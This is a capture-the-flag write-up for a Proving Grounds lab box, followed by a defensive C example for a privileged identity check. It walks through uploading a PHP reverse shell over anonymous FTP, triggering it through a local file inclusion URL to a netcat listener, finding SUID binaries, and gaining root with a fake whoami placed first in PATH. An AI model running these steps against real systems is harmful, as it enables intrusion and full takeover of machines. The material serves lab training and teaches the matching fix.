Key learning opportunities here:
– LFI (Local File Inclusion): log in to FTP anonymously, upload php-reverse-shell.php, then call it through a web browser or curl so the web server executes it and hands you a www-data shell.
– Take advantage of how PATH lookup works: directories are searched in the order they appear in your PATH.
– Create a file such as /tmp/whoami to answer the identity check of a SUID binary that verifies who you are.

1. nmap reveals 21, 22 and 80 open.
2. I suspected an LFI (local file inclusion). Initial scans indicated that anonymous FTP was allowed, so I uploaded php-reverse-shell.php; we'll call it later to get a local shell.
3. Moving on, # curl 192.168.114.13/robots.txt was disallowed with the message: "You are not a search engine! You can't read my robots.txt!"
4. Fine. # curl -A "GoogleBot" http://192.168.114.13/robots.txt
User-agent: *
Disallow: /secret_information/
5. Followed the link http://target/secret_information/?lang=en.php and we see the nice PHP file ready to mess with.
6. Now we call the reverse shell, but first start a netcat listener so that the incoming connection is accepted:
# nc -nvlp 4444 (or whatever TCP port you like; just edit your reverse PHP shell to match that port and your local IP).
Kali has reverse shells here: /usr/share/webshells/php/php-reverse-shell.php
7. Anyhow, http://192.168.114.13/secret_information/?lang=/var/ftp/pub/shell.php&cmd=id
8. A reverse shell should pop up in your netcat listener. From there we must escalate privileges.
9. We get a shell, but it's pretty useless, so: python -c 'import pty; pty.spawn("/bin/bash")'
Now we're in a bash shell. Careful not to break the shell with anything too crazy.
10. Now, a common route is to find SUID binaries we can use to escalate privileges. Those are programs that run with the privileges of the file's owner (root, when root owns them) no matter who runs them. Seems crazy, but it works.
Find binaries with the SUID bit set (either one works):
# find / -perm -u=s -type f 2>/dev/null
# find / -perm -4000 2>/dev/null
11. We find one very interesting file, /home/tom/rootshell. When we run it, it checks whether we're 'tom', and we're not. BUT! The rootshell.c source is in the same /home/tom directory, and reading it shows that the binary calls the command 'whoami' by name rather than by absolute path. We can take advantage of how Linux/Unix PATH lookup works: prepend a directory of our own to PATH and put a file there that is found before the real whoami and answers the way rootshell needs in order to give us root privileges.
12. $ export PATH=/tmp:$PATH, then $ echo $PATH to see that /tmp now appears before the others:
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
This just means we can put our own answer to rootshell.c's "who are you" question in /tmp, and it will be found before the real whoami binary in /usr/bin/whoami.
13. So: $ echo 'printf "tom"' > /tmp/whoami, then $ chmod +x /tmp/whoami, and run the binary /home/tom/rootshell. Your fake /tmp/whoami is called instead of /usr/bin/whoami, the printf answers in the affirmative that you appear to be tom, and you get root.
14. cat /root/proof.txt and submit it to Proving Grounds for credit.
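The rootshell trick in steps 11-13 works only because the binary asks an external program, found through the caller's PATH, who the caller is. As an added example (my own code, not the lab's rootshell.c and not from the original post), here is how a privileged helper should do that check and neutralise the PATH trick: it pins PATH to a fixed set of system directories before doing anything else, compares the caller's real uid against the expected account with getuid()/getpwnam_r instead of spawning whoami, and includes an audit routine that flags PATH entries an attacker could plant a fake binary in (empty or relative entries, or directories others can write to, such as /tmp). The names caller_is, caller_name, count_unsafe_path_entries, pin_path and the SAFE_PATH value are my assumptions, not anything from the lab.

```c
// Added example: identity check and PATH hygiene for a privileged helper.
// Not the lab's rootshell.c; function names and SAFE_PATH are assumptions.
#define _GNU_SOURCE
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define SAFE_PATH "/usr/sbin:/usr/bin:/sbin:/bin"

/* Resolve the caller's REAL uid (not the effective uid a SUID binary runs
 * with) to a user name without spawning any program, so PATH cannot
 * influence the answer. Returns 1 and fills buf on success, 0 otherwise. */
int caller_name(char *buf, size_t len) {
    struct passwd pw, *res = NULL;
    char tmp[4096];
    if (getpwuid_r(getuid(), &pw, tmp, sizeof tmp, &res) != 0 || res == NULL)
        return 0;
    if (strlen(pw.pw_name) >= len) return 0;
    strcpy(buf, pw.pw_name);
    return 1;
}

/* The check rootshell.c should have made: compare the caller's real uid with
 * the uid of the expected account. An unknown account is a deny, not a pass. */
int caller_is(const char *expected) {
    struct passwd pw, *res = NULL;
    char tmp[4096];
    if (getpwnam_r(expected, &pw, tmp, sizeof tmp, &res) != 0 || res == NULL)
        return 0;
    return getuid() == pw.pw_uid;
}

/* Audit one PATH string the way a reviewer would. An entry is unsafe if it is
 * empty (an empty field means the current directory), relative, not a
 * directory, or a directory other users can write to (/tmp is the classic).
 * Returns the number of unsafe entries, or -1 on allocation failure. */
int count_unsafe_path_entries(const char *path) {
    int unsafe = 0;
    size_t n = strlen(path);
    char *copy = strdup(path);
    if (!copy) return -1;
    /* strtok_r skips empty fields, so catch leading, trailing and "::" first. */
    if (n == 0 || path[0] == ':' || path[n - 1] == ':' || strstr(path, "::"))
        unsafe++;
    char *save = NULL;
    for (char *e = strtok_r(copy, ":", &save); e; e = strtok_r(NULL, ":", &save)) {
        struct stat st;
        if (e[0] != '/') { unsafe++; continue; }        /* relative entry */
        if (stat(e, &st) != 0) continue;                 /* missing: nothing to plant yet */
        if (!S_ISDIR(st.st_mode)) { unsafe++; continue; }
        if (st.st_mode & S_IWOTH) unsafe++;              /* world-writable, e.g. /tmp */
    }
    free(copy);
    return unsafe;
}

/* Pin PATH before any exec; returns the value now in the environment. */
const char *pin_path(void) {
    setenv("PATH", SAFE_PATH, 1);
    return getenv("PATH");
}

int main(void) {
    pin_path();
    char who[256];
    if (caller_name(who, sizeof who))
        printf("real uid %u resolves to %s\n", (unsigned)getuid(), who);
    printf("caller is tom: %s\n", caller_is("tom") ? "yes" : "no");
    /* Constructed PATH mirroring the hijack in step 12 above. */
    printf("unsafe entries in /tmp:/usr/bin:/bin -> %d\n",
           count_unsafe_path_entries("/tmp:/usr/bin:/bin"));
    printf("unsafe entries in pinned PATH -> %d\n",
           count_unsafe_path_entries(pin_path()));
    return 0;
}
```

Run it as an unprivileged user and the /tmp-prefixed PATH reports one unsafe entry while the pinned PATH reports none; with the uid comparison in place, a fake whoami in /tmp changes nothing because the helper never looks for whoami at all.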


Greg

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.